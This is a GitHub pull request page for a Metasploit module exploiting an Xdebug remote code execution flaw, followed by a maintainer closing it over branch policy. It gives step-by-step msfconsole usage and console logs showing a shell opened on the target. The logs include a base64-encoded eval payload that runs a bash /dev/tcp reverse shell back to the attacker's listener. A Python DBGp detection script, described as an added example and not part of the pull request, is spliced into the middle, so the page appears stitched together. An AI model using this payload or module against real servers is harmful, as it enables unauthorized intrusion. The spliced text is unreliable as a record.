Xdebug < 2.5.5 Remote Code Execution #9916

Closed
wants to merge 2 commits into from


@MinatoTW
Contributor

commented Apr 23, 2018

Xdebug is a PHP debugging tool that supports remote debugging of PHP code on the server via source code.
This module exploits the RCE vulnerability and gives a command shell back.

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploits/unix/http/xdebug_rce
  • check
  • set RHOST 10.10.10.83
  • set LHOST 10.10.14.197
  • exploit

Example Outputs

  • Check

```
msf exploit(unix/http/xdebug_rce) > set RHOST 10.10.10.83
RHOST => 10.10.10.83
msf exploit(unix/http/xdebug_rce) > set LHOST tun0
LHOST => tun0
msf exploit(unix/http/xdebug_rce) > check

[+] 10.10.10.83:80 - Looks like remote server has xdebug enabled

[*] 10.10.10.83:80 The target service is running, but could not be validated.
msf exploit(unix/http/xdebug_rce) >
```

  • Run

```
msf exploit(unix/http/xdebug_rce) > run

[*] Started reverse TCP handler on 10.10.14.197:4444
[+] 10.10.10.83:80 - Looks like remote server has xdebug enabled

[*] 10.10.10.83:80 - Sending payload......
[*] 10.10.10.83:80 - Waiting for client response.....
[*] 10.10.10.83:80 - Received data.....
[*] Command shell session 1 opened (10.10.14.197:4444 -> 10.10.10.83:36628) at 2018-04-23 20:45:41 +0530

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

  • Run verbose output

```
msf exploit(unix/http/xdebug_rce) > set verbose true
verbose => true
msf exploit(unix/http/xdebug_rce) > run

[*] Started reverse TCP handler on 10.10.14.197:4444
Request send
Date: Mon, 23 Apr 2018 15:16:56 GMT
Server: Apache
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Xdebug: 2.5.5
Content-Length: 314
Content-Type: text/html; charset=UTF-8


[+] 10.10.10.83:80 - Looks like remote server has xdebug enabled

[*] 10.10.10.83:80 - Sending payload......
Payload sent-eval -i 1 -- c3lzdGVtKCIgYmFzaCAtYyAnMDwmMTkyLTtleGVjIDE5Mjw+L2Rldi90Y3AvMTAuMTAuMTQuMTk3LzQ0NDQ7c2ggPCYxOTIgPiYxOTIgMj4mMTkyJyIp
[*] 10.10.10.83:80 - Waiting for client response.....
[*] 10.10.10.83:80 - Received data.....
490<?xml version="1.0" encoding="iso-8859-1"?>
<init xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" fileuri="file:///var/www/html/index.php" language="PHP" xdebug:language_version="7.1.12" protocol_version="1.0" appid="1179" idekey="jtGjvfApYD"><engine version="2.5.5"><![CDATA[Xdebug]]></engine><author><![CDATA[Derick Rethans]]></author><url><![CDATA[http://xdebug.org]]></url><copyright><![CDATA[Copyright (c) 2002-2017 by Derick Rethans]]></copyright></init>
[*] Command shell session 2 opened (10.10.14.197:4444 -> 10.10.10.83:36676) at 2018-04-23 20:46:56 +0530

id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
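
For defenders, the init packet in the verbose output above is a usable network signature: a web server opening a DBGp session to a peer that is not a known IDE workstation. The following is an added example, not part of this pull request or of Metasploit; it parses the length-prefixed DBGp frame from a captured payload and classifies the flow. The function names and the caller-supplied allowlist of developer networks are assumptions.

```python
import ipaddress
import xml.etree.ElementTree as ET

NS = "{urn:debugger_protocol_v1}"

# Constructed sample: the init packet from the verbose output, trimmed and
# re-framed as DBGp sends it on the wire (ASCII length, NUL, XML, NUL).
_XML = (
    b'<?xml version="1.0" encoding="iso-8859-1"?>\n'
    b'<init xmlns="urn:debugger_protocol_v1" '
    b'fileuri="file:///var/www/html/index.php" language="PHP" '
    b'protocol_version="1.0" appid="1179" idekey="jtGjvfApYD">'
    b'<engine version="2.5.5"><![CDATA[Xdebug]]></engine></init>'
)
SAMPLE = str(len(_XML)).encode() + b"\x00" + _XML + b"\x00"


def parse_dbgp_init(payload: bytes):
    """Return init-packet fields, or None if this is not a DBGp init frame."""
    head, sep, rest = payload.partition(b"\x00")
    if not sep or not head.isdigit():
        return None
    body = rest[: int(head)]
    if len(body) < int(head) or b"<!DOCTYPE" in body or b"<!ENTITY" in body:
        return None  # truncated capture, or XML we refuse to parse
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    if root.tag != NS + "init":
        return None
    engine = root.find(NS + "engine")
    return {
        "fileuri": root.get("fileuri"),
        "idekey": root.get("idekey"),
        "engine_version": None if engine is None else engine.get("version"),
    }


def classify_flow(dst_ip: str, payload: bytes, allowed_nets):
    """Flag a server-initiated DBGp session whose peer is not a known IDE host."""
    info = parse_dbgp_init(payload)
    if info is None:
        return None
    dst = ipaddress.ip_address(dst_ip)
    trusted = any(dst in ipaddress.ip_network(net) for net in allowed_nets)
    info.update(dst=dst_ip, verdict="expected" if trusted else "alert")
    return info
```

Feed it the first client-to-server payload of each outbound TCP flow from the web tier; an `alert` verdict on a production host means the debugger is reachable and should be disabled there.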
@jmartin-r7

Contributor

commented Apr 23, 2018

It is required that code in your fork be merged from a unique branch in your repository to master in Rapid7's. Please create a new branch in your fork of framework and resubmit this from that branch.

```
git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>
```

This helps protect the process, ensures users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes, and allows contributors to make progress while a PR is still being reviewed.

Closing based on this requirement; please do resubmit from a unique branch.

@jmartin-r7 jmartin-r7 closed this Apr 23, 2018

@MinatoTW

Contributor Author

commented Apr 23, 2018

Moved it @jmartin-r7
